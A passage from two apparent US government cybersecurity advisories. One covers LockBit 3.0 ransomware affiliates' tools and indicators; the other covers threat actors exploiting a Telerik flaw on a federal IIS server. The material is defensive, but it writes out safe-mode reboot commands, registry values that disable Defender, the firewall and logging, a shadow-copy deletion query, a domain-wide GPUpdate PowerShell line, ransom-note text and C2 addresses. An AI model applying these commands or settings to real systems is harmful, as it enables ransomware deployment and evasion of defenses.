LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).

Table 1: Anonymous File Sharing Sites Used to Exfiltrate Data Before System Encryption
File Sharing Site
https://www.premiumize[.]com
https://anonfiles[.]com
https://www.sendspace[.]com
https://fex[.]net
https://transfer[.]sh
https://send.exploit[.]in
LEVERAGING FREEWARE AND OPEN-SOURCE TOOLS

LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts
are observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:

Table 2: Freeware and Open-Source Tools Used by LockBit 3.0 Affiliates
Tool Description MITRE ATT&CK ID
Chocolatey Command-line package manager for Windows. T1072
FileZilla Cross-platform File Transfer Protocol (FTP) application. T1071.002
Impacket Collection of Python classes for working with network protocols. S0357
MEGA Ltd MegaSync Cloud-based synchronization tool. T1567.002
Microsoft Sysinternals ProcDump Generates crash dumps. Commonly used to dump the contents of Local Security Authority Subsystem Service, LSASS.exe. T1003.001
Microsoft Sysinternals PsExec Execute a command-line process on a remote machine. S0029
Mimikatz Extracts credentials from system. S0002
Ngrok Legitimate remote-access tool abused to bypass victim network protections. S0508
PuTTY Link (Plink) Can be used to automate Secure Shell (SSH) actions on Windows. T1572
Rclone Command-line program to manage cloud storage files S1040
SoftPerfect Network Scanner Performs network scans. T1046
Splashtop Remote-desktop software. T1021.001
WinSCP SSH File Transfer Protocol client for Windows. T1048
Indicators of Compromise (IOCs)

The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.

LockBit 3.0 Black Icon

LockBit 3.0 black icon.

 

 

LockBit 3.0 Wallpaper

Rectangular wallpaper reading

 

 

 

LockBit Command Line Parameters

LockBit Parameters Description
-del
Self-delete.
-gdel
Remove LockBit 3.0 group policy changes.
-gspd
Spread laterally via group policy.
-pass (32 character value)
(Required) Password used to launch LockBit 3.0.
-path (File or path)
Only encrypts provided file or folder.
-psex
Spread laterally via admin shares.
-safe
Reboot host into Safe Mode.
-wall
Sets LockBit 3.0 Wallpaper and prints out LockBit 3.0 ransom note.
Mutual Exclusion Object (Mutex) Created

When executed, LockBit 3.0 will create the mutex, Global,
and check to see if this mutex has already been created to avoid running more than one instance of the ransomware.

UAC Bypass via Elevated COM Interface

LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via elevated Component Object Model (COM) Interface. C:WindowsSystem32dllhost.exe is spawned with high integrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC.

For example, %SYSTEM32%dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}.

Volume Shadow Copy Deletion

LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.

Registry Artifacts

LockBit 3.0 Icon

Registry Key Value Data
HKCR. 
(Default)
HKCRDefaultIcon
(Default)
C:ProgramData.ico

LockBit 3.0 Wallpaper

Registry Key Value Data
HKCUControl PanelDesktopWallPaper
(Default)
C:ProgramData.bmp

Disable Privacy Settings Experience

Registry Key Value Data
SOFTWAREPoliciesMicrosoftWin
dowsOOBE
DisablePrivacyE
xperience
0

Enable Automatic Logon

Registry Key Value Data
SOFTWAREMicrosoftWindows
NTCurrentVersionWinlogon
AutoAdminLogon
1
 
DefaultUserName
 
DefaultDomainNa
me
 
DefaultPassword

Disable and Clear Windows Event Logs

Registry Key Value Data
HKLMSOFTWAREMicrosoftWindows
CurrentVersionWINEVTChannels
*
Enabled
0
HKLMSOFTWAREMicrosoftWindows
CurrentVersionWINEVTChannels
* ChannelAccess
ChannelAccess
AO:BAG:SYD:(A;;0x1;;
;SY)(A;;0x5;;;BA)(A;
;0x1;;;LA)
Ransom Locations
LockBit 3.0 File Path Locations
ADMIN$Temp.exe
%SystemRoot%Temp.exe
sysvolscripts.exe (Domain Controller)
Safe Mode Launch Commands

LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:

Operating System Safe Mode with Networking command
Vista and newer
bcdedit /set {current} safeboot network
Pre-Vista
bootcfg /raw /a /safeboot:network /id 1
Operating System Disable Safe mode reboot
Vista and newer
bcdedit /deletevalue {current} safeboot
Pre-Vista
bootcfg /raw /fastdetect /id 1
Group Policy Artifacts

The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:

NetworkShares.xml


image="2" name="%%ComputerName%%_D" changed="%s" uid="%s">

Services.xml stops and disables services on the Active Directory (AD) hosts.

Services.xml


name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0">


name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0">


name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0">


name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0">


name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0">


name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">


name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0">


name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0">


name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0">


name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0">


name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0">


name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0">


name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0">


name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0">


name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0">


name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">


name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0">


Registry.pol

The following registry configuration changes values for the Group Policy refresh time, disable SmartScreen, and disable Windows Defender.

Registry Key Registry Value Value type Data
HKLMSOFTWAREPoliciesMicrosoftWindow
sSystem
GroupPolicyRefresh
TimeDC
REG_D
WORD
1
HKLMSOFTWAREPoliciesMicrosoftWindow
sSystem
GroupPolicyRefresh
TimeOffsetDC
REG_D
WORD
1
HKLMSOFTWAREPoliciesMicrosoftWindow
sSystem
GroupPolicyRefresh
Time
REG_D
WORD
1
HKLMSOFTWAREPoliciesMicrosoftWindow
sSystem
GroupPolicyRefresh
TimeOffset
REG_D
WORD
1
HKLMSOFTWAREPoliciesMicrosoftWindow
sSystem
EnableSmartScreen
REG_D
WORD
0
HKLMSOFTWAREPoliciesMicrosoftWindow
sSystem
**del.ShellSmartSc
reenLevel
REG_S
Z
 
HKLMSOFTWAREPoliciesMicrosoftWindow
s Defender
DisableAntiSpyware
REG_D
WORD
1
HKLMSOFTWAREPoliciesMicrosoftWindow
s Defender
DisableRoutinelyTa
kingAction
REG_D
WORD
1
HKLMSOFTWAREPoliciesMicrosoftWindow
s DefenderReal-Time Protection
DisableRealtimeMon
itoring
REG_D
WORD
1
HKLMSOFTWAREPoliciesMicrosoftWindow
s DefenderReal-Time Protection
DisableBehaviorMon
itoring
REG_D
WORD
1
HKLMSOFTWAREPoliciesMicrosoftWindow
s DefenderSpynet
SubmitSamplesConse
nt
REG_D
WORD
2
HKLMSOFTWAREPoliciesMicrosoftWindow
s DefenderSpynet
SpynetReporting
REG_D
WORD
0
HKLMSOFTWAREPoliciesMicrosoftWindow
sFirewallDomainProfile
EnableFirewall
REG_D
WORD
0
HKLMSOFTWAREPoliciesMicrosoftWindow
sFirewallStandardProfile
EnableFirewall
REG_D
WORD
0
Force GPUpdate

Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.

Force GPUpdate Powershell Command
powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke- GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}
Services Killed
vss sql svc$
memtas mepocs msexchange
sophos veeam backup
GxVss GxBlr GxFWD
GxCVD GxCIMgr  
Processes Killed
sql oracle ocssd
dbsnmp synctime agntsvc
isqlplussvc xfssvccon mydesktopservice
ocautoupds encsvc firefox
tbirdconfig mydesktopqos ocomm
dbeng50 sqbcoreservice excel
infopath msaccess mspu
onenote outlook powerpnt
steam thebat thunderbird
visio winword wordpad
notepad    
LockBit 3.0 Ransom Note

~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.

Network Connections

If configured, Lockbit 3.0 will send two HTTP POST requests to one of the C2servers. Information about the victim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.

Example of HTTP POST request
POST /?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br Content-Type: text/plain
User-Agent: Safari/537.36 
Host: 
Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP= Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl
Example of information found in encrypted data
{
"bot_version":"X",
"bot_id":"X",
"bot_company":"X", "host_hostname":"X", "host_user":"X",
"host_os":"X",
"host_domain":"X",
"host_arch":"X",
"host_lang":"X", "disks_info":[
{
"disk_name":"X",
"disk_size":"XXXX", "free_size":"XXXXX"
}
User Agent Strings
Mozilla/5.0 (Windows NT
6.1)
AppleWebKit/587.38
(KHTML, like Gecko)
Chrome/91.0.4472.77
Safari/537.36 Edge/91.0.864.37 Firefox/89.0
Gecko/20100101    

MITRE ATT&CK TECHNIQUES

See Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.

Table 3: LockBit 3.0 Actors ATT&CK Techniques for Enterprise
Initial Access    
Technique Title ID Use
Valid Accounts T1078 LockBit 3.0 actors obtain and abuse credentials of existing accounts as a means of gaining initial access.
Exploit External Remote Services T1133 LockBit 3.0 actors exploit RDP to gain access to victim networks.
Drive-by Compromise T1189 LockBit 3.0 actors gain access to a system through a user visiting a website over the normal course of browsing.
Exploit Public-Facing Application T1190 LockBit 3.0 actors exploit vulnerabilities in internet-facing systems to gain access to victims’ systems.
Phishing T1566 LockBit 3.0 actors use phishing and spearphishing to gain access to victims' networks.
Execution    
Technique Title ID Use
Execution TA0002 LockBit 3.0 launches commands during its execution.
Software Deployment Tools T1072 LockBit 3.0 uses Chocolatey, a command- line package manager for Windows.
Persistence    
Technique Title ID Use
Valid Accounts T1078 LockBit 3.0 uses a compromised user account to maintain persistence on the target network.
Boot or Logo Autostart Execution T1547 LockBit 3.0 enables automatic logon for persistence.
Privilege Escalation    
Technique Title ID Use
Privilege Escalation TA0004 Lockbit 3.0 will attempt to escalate to the required privileges if current account privileges are insufficient.
Boot or Logo Autostart Execution T1547 LockBit 3.0 enables automatic logon for privilege escalation.
Defense Evasion    
Technique Title ID Use
Obfuscated Files or Information T1027 LockBit 3.0 will send encrypted host and bot information to its C2 servers.
Indicator Removal: File Deletion T1070.004 LockBit 3.0 will delete itself from the disk.
Execution Guardrails: Environmental Keying T1480.001 LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered.
Credential Access    
Technique Title ID Use
OS Credential Dumping: LSASS Memory T1003.001 LockBit 3.0 uses Microsoft Sysinternals ProDump to dump the contents of LSASS.exe.
Discovery    
Technique Title ID Use
Network Service Discovery T1046 LockBit 3.0 uses SoftPerfect Network Scanner to scan target networks.
System Information Discovery T1082 LockBit 3.0 will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices.
System Location   Discovery: System Language Discovery T1614.001 LockBit 3.0 will not infect machines with language settings that match a defined exclusion list.
Lateral Movement    
Technique Title ID Use
Remote Services:   Remote Desktop Protocol T1021.001 LockBit 3.0 uses Splashtop remote- desktop software to facilitate lateral movement.
Command and Control    
Technique Title ID Use
Application Layer Protocol: File Transfer Protocols T1071.002 LockBit 3.0 uses FileZilla for C2.
Protocol Tunnel T1572 LockBit 3.0 uses Plink to automate SSH actions on Windows.
Exfiltration    
Technique Title ID Use
Exfiltration TA0010 LockBit 3.0 uses Stealbit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network.
Exfiltration Over Web Service T1567 LockBit 3.0 uses publicly available file sharing services to exfiltrate a target’s data.
Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 LockBit 3.0 actors use (1) rclone, an open source command line cloud storage manager to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration.
Impact    
Technique Title ID Use
Data Destruction T1485 LockBit 3.0 deletes log files and empties the recycle bin.
Data Encrypted for Impact T1486 LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources.
Service Stop T1489 LockBit 3.0 terminates processes and services.
Inhibit System Recovery T1490 LockBit 3.0 deletes volume shadow copies residing on disk.
Defacement: Internal Defacement T1491.001 LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively.

MITIGATIONS

The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud).
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies [CPG 3.4].
    • Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4]
    • Store passwords in hashed format using industry-recognized password managers
    • Add password user “salts” to shared login credentials
    • Avoid reusing passwords
    • Implement multiple failed login attempt account lockouts [CPG 1.1]
    • Disable password “hints”
    • Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software
  • Require phishing-resistant multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
  • Segment networks [CPG 8.1] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [CPG 5.1]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
  • Disable unused ports.
  • Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
  • Disable hyperlinks in received emails.
  • Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
  • Maintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 3).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

The FBI is seeking any information that can be legally shared, including:

  • Boundary logs showing communication to and from foreign IP addresses
  • Sample ransom note
  • Communications with LockBit 3.0 actors
  • Bitcoin wallet information
  • Decryptor files
  • Benign sample of an encrypted file

The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.

March 13, 2023

Threat Actors Exploit Progress Telerik Vulnerability in U.S. Government IIS Server | CISA

SUMMARY

From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]

Actions to take today to mitigate malicious cyber activity:

  • Implement a patch management solution to ensure compliance with the latest security patches.
  • Validate output from patch management and vulnerability scanning against running services to check for discrepancies and account for all services.
  • Limit service accounts to the minimum permissions necessary to run services.

CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.

Download the PDF version of this report:

For a downloadable copy of IOCs, see

AA23-074A STIX XML (XML, 30.96 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.

Overview

CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency’s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.

In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248. Analysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[2] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities—CVE-2017-11357 or CVE-2017-11317—present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.

Threat Actor Activity

CISA and authoring organizations observed multiple cyber threat actors, including an APT actor—hereafter referred to as Threat Actor 1 (TA1)—and known cybercriminal actor XE Group—hereafter referred to as Threat Actor 2 (TA2)—conducting reconnaissance and scanning activities [T1595.002] that correlate to the successful exploitation of CVE-2019-18935 in the agency’s IIS server running Telerik UI for ASP.NET AJAX [T1190].

When exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [T1105] to the C:WindowsTemp directory. The malicious files were then executed from the C:WindowsTemp directory via the w3wp.exe process—a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [T1055.001] and detected as early as August 2021.

CISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[3] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern [10 digits].[7 digits].dll (e.g., a file created on October 31, 2022, could be 1667203023.5321205.dll).

The names of some of the PNG files were misleading. For example, file 1596835329.5015914.png, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [T1070.006] technique. This file naming convention is a primary IOC used by the threat actors.

In many cases, malicious artifacts were not available for analysis because the threat actors’ malware—that looks for and removes files with the .dll file extension—removed files [T1070.004] from the C:WindowsTemp directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by the w3wp.exe process. CISA observed error messages being sent to the threat actors’ command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.

Network activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.

Threat Actor 1

CISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the w3wp.exe process. In this instance, TA1 was able to upload malicious DLL files to the C:WindowsTemp directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.

At least nine DLL files used for discovery [TA0007], C2 [TA0011], and defense evasion [TA0005]. All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. All analyzed samples communicate this collected data to a C2 server at IP address 137.184.130[.]162 or 45.77.212[.]12. The C2 traffic to these IP addresses uses a non-application layer protocol [T1095] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that:

  • Some of the analyzed samples can load additional libraries; enumerate the system, processes, files, directories [T1083]; and write files.
  • Other analyzed samples can delete DLL files ending with the .dll extension in the C:WindowsTemp directory on the server. TA1 may use this capability to hide additional malicious activity on the network.

CISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:

Table 1: Observed TA1 IPs and Timestamps

IP Address

First Identified

Last Identified

137.184.130[.]162

09/26/2022

10/08/2022

45.77.212[.]12

10/07/2022

11/25/2022

104.225.129[.]102

10/10/2022

11/16/2022

149.28.85[.]24

10/12/2022

10/17/2022

185.186.245[.]72

10/18/2022

10/18/2022

193.8.172[.]113

09/25/2022

09/25/2022

193.8.172[.]13

09/25/2022

10/17/2022

216.120.201[.]12

10/13/2022

11/10/2022

5.34.178[.]246

09/25/2022

09/25/2022

79.133.124[.]242

09/25/2022

09/25/2022

92.38.169[.]193

09/27/2022

10/08/2022

92.38.176[.]109

09/12/2022

09/25/2022

92.38.176[.]130

09/25/2022

10/07/2022

Threat Actor 2

TA2—identified as likely the cybercriminal actor XE Group—often includes xe[word] nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[4]

As early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [T1036.005]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the C:WindowsTemp directory that TA2 executed via the w3wp.exe process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 2. Note: At the time of analysis, the domains resolved to the listed IP addresses.

Table 2: TA2 IPs and Resolving Domains

IP Address

Resolving Domains

184.168.104[.]171

xework[.]com

xegroups[.]com

hivnd[.]com

144.96.103[.]245

xework[.]com

Analysis of DLL files determined the files listed in Table 3 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility certutil[.]exe and writing new files as xesvrs[.]exe to invoke reverse shell utilities execution.

Table 3: Identified Malicious Files

Filename

Description

XEReverseShell.exe

DLL files (masqueraded as PNG files) located in the C:WindowsTemp directory contain a base64 encoded file with the internal name XEReverseShell.exe, which was dropped into the same directory as sortcombat.exe.

When executed, the reverse shell utility attempts to connect to xework[.]com or xegroups[.]com to obtain the IP address of the C2 server and port number for unencrypted communication.

Note: It is likely the threat actors changed the file extension from .dll to .png to avoid detection.

Multi-OS_ReverseShell.exe

Reverse shell utility decoded from the base64 encoded file xesmartshell.tmp.

When executed, it will attempt to connect to xegroups[.]com or xework[.]com to obtain the IP address of the C2 server and port number for unencrypted communication.

SortVistaCompat

Base64 encoded payload dropped from Multi-OS_ReverseShell.exe. This file receives the C2 IP and port from xework[.]com.

 When the TA2 malware is executed a DLL file drops an executable (XEReverseShell.exe) that attempts to pull a C2 IP address and port number from xework[.]com or xegroups[.]com.

  • If no port or IP address is found, the program will exit.
  • If a port and IP address are found, the program will establish a listener and wait for further commands.

If communication is established between the TA2 malware and the C2:

  • The malware will identify the operating system (Windows or Linux) and create the appropriate shell (cmd or bash), sending system information back to the C2.
  • The C2 server may send the command xesetshell, causing the malware to connect to the server and download a file called small.txt—a base64-encoded webshell that the malware decodes and places in the C:WindowsTemp directory.
  • The C2 server may send the command xequit, causing the malware to sleep for a period of time determined by the threat actors.

The two files xesmartshell.tmp and SortVistaCompat have the capability to drop an Active Server Pages (ASPX) webshell—a base64 encoded text file small.txt decoded [T1140] as small.aspx [T1505.003]—to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.

For more information on the DLLs, binaries, and webshell, see CISA MAR-10413062-1.v1 Telerik Vulnerability in U.S. Government IIS Server.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 4 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.

Table 4: Identified ATT&CK Techniques for Enterprise

Reconnaissance

   

Technique Title

ID

Use

Active Scanning: Vulnerability Scanning

T1595.002

Actors were observed conducting active scanning activity for vulnerable devices and specific ports.

Initial Access

   

Technique Title

ID

Use

Exploit Public-Facing Application

T1190

Actors exploited a known vulnerability in the Microsoft IIS server.

Persistence

   

Technique Title

ID

Use

Server Software Component: Web Shell

T1505.003

TA2’s malware dropped an ASPX webshell to enumerate drives; send, receive, and delete files; and execute commands.

Defense Evasion

   

Technique Title

ID

Use

Masquerading: Match Legitimate Name or Location

T1036.005

Actors leveraged the legitimate w3wp.exe process on the IIS server to write malicious DLL files and evade detection.

Process Injection: DLL Injection

T1055.001

Actors loaded newly created DLLs into a running w3wp.exe process.

Indicator Removal: File Deletion

T1070.004

TA1’s malware deleted files with ".dll" from the C:WindowsTemp directory, which may indicate hidden malicious activity on the network.

Indicator Removal: Timestomp

T1070.006
